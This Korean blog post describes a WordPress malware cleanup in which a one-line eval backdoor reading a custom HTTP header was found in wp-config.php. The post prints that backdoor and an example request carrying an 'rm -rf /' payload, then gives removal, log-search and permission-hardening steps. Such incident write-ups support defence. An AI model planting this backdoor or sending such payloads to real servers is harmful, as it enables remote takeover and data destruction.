워드프레스 멀웨어: wp-config.php 파일 감염 치료

워드프레스는 전 세계적으로 가장 많이 사용되는 CMS(Content Management System)이지만 보안 관행을 무시할 경우 보안 위협에 노출될 수 있습니다. 특히, 사이트의 핵심 설정 파일인 wp-config.php에 악성코드가 삽입될 경우, 심각한 보안 문제가 발생할 수 있습니다. 이번 글에서는 wp-config.php 파일에 포함될 수 있는 악성코드 예제와 그 위험성, 그리고 대응 방법을 알아보겠습니다.

워드프레스 멀웨어: wp-config.php 파일 감염 치료

wp-config.php 파일 내의 수상한 코드

최근 워드프레스 사이트가 이상한 스팸 사이트로 리디렉션되는 현상으로 클라이언트께서 멀웨어 제거를 의뢰해 왔습니다.

사이트에서 악성코드를 모두 제거한 후에 Wordfence 보안 플러그인을 설치하여 멀웨어 스캔을 해보았습니다. 그런데 wp-config.php 파일에 악성코드가 심어져 있는 것 같다는 경고가 표시되었습니다.

이때까지 많은 사이트에서 악성코드를 제거했지만, wp-config.php 파일까지 감염되는 사례는 비교적 드문 것 같았습니다. 가끔 wp-config.php 파일에 명백한 악의적인 코드가 심어져 있는 것을 접한 적이 있습니다만, 그런 경우에는 쉽게 삭제할 수 있지만, 이번에는 끝 부분에 한 라인의 코드가 삽입되어 있었습니다.

@eval($_SERVER['HTTP_83EA74D']);

이 코드가 의미하는 바는 무엇일까요?

이 코드가 악성코드인 이유

위 코드는 PHP의 eval() 함수를 사용하여 특정 입력 값을 실행하도록 설계되었습니다.

eval() 함수의 위험성

eval() 함수는 문자열을 PHP 코드로 변환하여 실행하는 기능을 합니다. 즉, 외부에서 전달된 값이 실행되도록 허용하는 구조입니다.

원격 코드 실행(RCE, Remote Code Execution) 가능성

$_SERVER['HTTP_83EA74D']는 사용자가 HTTP 요청 헤더를 통해 전달하는 값입니다. 공격자는 악성 명령을 포함한 HTTP 헤더를 서버로 보내고, 이 값이 eval()에 의해 실행되면 서버에서 원격 코드 실행이 가능해집니다.

예를 들어, 공격자가 다음과 같은 요청을 보낼 수 있습니다.

GET /wp-config.php HTTP/1.1
Host: victim.com
HTTP_83EA74D: system('rm -rf /');

이렇게 되면, system('rm -rf /'); 코드가 실행되어 서버의 모든 파일이 삭제될 수 있다고 합니다.

탐지 회피 기법

일반적인 악성코드는 쉽게 탐지될 수 있지만, wp-config.php는 필수적인 설정 파일이기 때문에 감염을 확인하기 어려운 경우가 많습니다. 또한, $_SERVER['HTTP_83EA74D']와 같은 비정상적인 HTTP 헤더를 사용하여 탐지를 우회하는 방법도 악성코드 제작자들이 자주 활용하는 기법입니다.

해결 방법

만약 위와 같은 코드가 wp-config.php에 포함되어 있다면 즉시 조치를 취해야 합니다.

악성 코드 제거

wp-config.php 파일을 열어 다음과 같은 수상한 코드가 있는지 확인한 후 즉시 삭제하세요.

@eval($_SERVER['HTTP_83EA74D']);

파일 무결성 확인

워드프레스 공식 파일과 비교하여 변경된 부분이 있는지 확인하는 것이 중요합니다.

diff wp-config.php clean-wp-config.php

위 명령어를 실행하면 변경된 내용이 표시됩니다.

파일 권한 강화

wp-config.php 파일의 권한을 적절하게 설정하여 불필요한 변경을 방지하세요.

chmod 440 wp-config.php

이렇게 설정하면 파일이 읽기 전용으로 설정되어 임의 수정이 어려워집니다.

웹 서버 로그 분석

해킹 여부를 확인하려면 서버의 접근 로그를 분석하는 것이 좋습니다.

grep "HTTP_83EA74D" /var/log/apache2/access.log

이 명령어를 실행하면 해당 헤더를 사용한 요청이 있는지 확인할 수 있습니다.

보안 플러그인 설치

Wordfence, Sucuri 같은 보안 플러그인을 사용하면 악성코드를 실시간으로 탐지하고 차단할 수 있습니다.

---

마치며

워드프레스 wp-config.php 파일은 웹사이트의 가장 중요한 설정 파일 중 하나로, 악성코드가 삽입될 경우 심각한 보안 위협이 발생할 수 있습니다. 특히, eval() 함수를 이용한 원격 코드 실행(RCE) 기법은 해커들이 자주 사용하는 방법이므로 항상 주의해야 합니다.

사이트가 멀웨어에 감염되면 제거가 쉽지 않고, 제거하더라도 완전히 악성코드를 제거하고 보안 조치를 하지 않으면 멀웨어가 재발할 수 있습니다.

악성코드 감염을 비롯하여 워드프레스나 웹호스팅 관련 문제로 어려움을 겪는 경우 여기에서 서비스(유료)를 의뢰하실 수 있습니다.

참고

https://avada.tistory.com/3589

카페24에 설치된 워드프레스를 케미클라우드(ChemiCloud)로 이전 후 업데이트 작업

https://avada.tistory.com/3458

블루호스트에서 멀웨어 치료 및 클라우드웨이즈로 워드프레스 이전 작업